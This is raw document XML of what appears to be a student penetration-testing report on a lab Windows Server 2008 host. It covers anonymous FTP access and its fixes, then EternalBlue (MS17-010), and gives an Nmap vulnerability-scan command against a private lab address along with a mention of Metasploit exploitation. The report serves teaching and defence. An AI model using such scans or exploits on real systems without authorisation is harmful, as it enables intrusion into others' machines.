                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1200" style="position:absolute;width:506;height:2243;left:0;top:3506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206" style="position:absolute;width:59436;height:32518;left:377;top:143;" filled="f">
                  <v:imagedata r:id="rId21"/>
                </v:shape>
                <v:shape id="Shape 1207" style="position:absolute;width:59721;height:32804;left:235;top:0;" coordsize="5972175,3280410" path="m0,3280410l5972175,3280410l5972175,0l0,0x">
                  <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#ff0000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="741E2D16" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B48E44" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC2A87C" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC67876" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D511F62" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="-5" w:right="1706"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc23319"/>
    </w:p>
    <w:p w14:paraId="104BA7CB" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRPr="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D"/>
    <w:p w14:paraId="4C08116C" w14:textId="06D7BBED" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="-5" w:right="1706"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.1.2 Selected Critical Vulnerability: Anonymous FTP Access </w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="6C912BCE" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="177" w:line="402" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="1706"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Why does it exist? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184A7A4B" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="313"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anonymous access was enabled by default on the FTP server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C425DD8" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="279"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There was no Access Control List (ACL) applied to the shared folders. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19171611" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="162" w:line="398" w:lineRule="auto"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Legacy operating systems like Windows Server 2008 typically depend on old and vulnerable services. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B6418D" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">How can it be exploited? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFD7A9D" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="313"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attackers </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>are able to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> log in anonymously to download or read confidential data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2655C250" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="313"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If write permissions are given, malware or exploits can be uploaded. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430C3268" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="315"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configuration and sensitive data files could be revealed even under read-only access. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F6943A" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="290" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Real-World Example: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA143BF" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="150" w:line="365" w:lineRule="auto"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In 2017, the FBI released an advisory where it had explicitly indicated that hackers were </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>actually exploiting</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> FTP servers configured for anonymous access, especially in the healthcare sector. The weakly secured servers were observed leaking sensitive data such as protected health information (PHI) and personally identifiable information (PII). Such leakage made the organizations vulnerable to attacks like blackmail, identity theft, and financial fraud (Kovacs, 2017).  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B0C597" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA92E4A" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="-5" w:right="3387"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc23320"/>
    </w:p>
    <w:p w14:paraId="7EAE2DC5" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="-5" w:right="3387"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2525DF82" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="-5" w:right="3387"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E2E1683" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRPr="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D"/>
    <w:p w14:paraId="0098E51C" w14:textId="7B130EA6" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="-5" w:right="3387"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.1.3 Corrective and Preventive Measures </w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="049A1FF1" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="177" w:line="402" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="3387"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Corrective Measures: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C81FF1" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="313"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disallow anonymous FTP login. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437E3926" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="313"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enforce users to authenticate themselves before any access is granted. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C634420" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="315"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enforce access from trusted IP ranges only. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6739758F" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Preventive Measures: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225FEB68" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="315"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement SFTP or FTPS in place of FTP. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D6C34E" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="313"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Have periodic configuration auditing and access logs checking. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0F6EF6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="265"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Employ automated vulnerability scanners to look for weak services. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4120B539" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED52E17" w14:textId="53A93287" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="206"/>
        <w:ind w:left="-5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc23321"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F5636D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F5636D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> MS17-010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="7355EEC9" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="5" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="3508"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Operating System </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Analyzed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: Windows Server 2008 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Selected Tools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9352" w:type="dxa"/>
        <w:tblInd w:w="5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="57" w:type="dxa"/>
          <w:left w:w="204" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2607"/>
        <w:gridCol w:w="6745"/>
      </w:tblGrid>
      <w:tr w:rsidR="0086222C" w14:paraId="199611EF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="422"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2607" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="42B68B55" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="90" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Tool </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6745" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="700C0E86" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="94" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Purpose </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0086222C" w14:paraId="2A2B2247" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2607" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2D3ABCFE" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="94" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nmap </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6745" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="41711478" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="99" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">For network reconnaissance and vulnerability testing </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0086222C" w14:paraId="048D6AB3" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2607" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="53CEB9BC" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Metasploit Framework </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6745" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3CB84720" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="96" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">For exploitation and validation </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="404300DC" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6584DBB9" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Justification: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EE4650" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="207" w:line="377" w:lineRule="auto"/>
        <w:ind w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap: The industry's initial network and port scan procedure uses Nmap as its standard protocol. Through scripts, the tool reveals vulnerable services along with their known weaknesses.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340C3970" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="202" w:line="377" w:lineRule="auto"/>
        <w:ind w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit: The exploitation framework, Metasploit, enables researchers to test how realistic it is to exploit detected vulnerabilities. The assignment used MS17-010 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) for its exploitation purposes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54045760" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="142" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="3387"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc23322"/>
      <w:r>
        <w:t>2.2.1 Technical Steps &amp; Screenshots</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="4598E7F9" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="536" w:lineRule="auto"/>
        <w:ind w:right="4514"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nmap Scan:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command use: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p –script smb-vuln-ms17-010 192.168.240.129 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16081D17" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5050C8D5" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="316"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> To check for SMBv1 vulnerability (MS17-010) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4635662D" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Result:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099D9B2D" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Host found vulnerable to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E56C41E" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="283" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="37" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
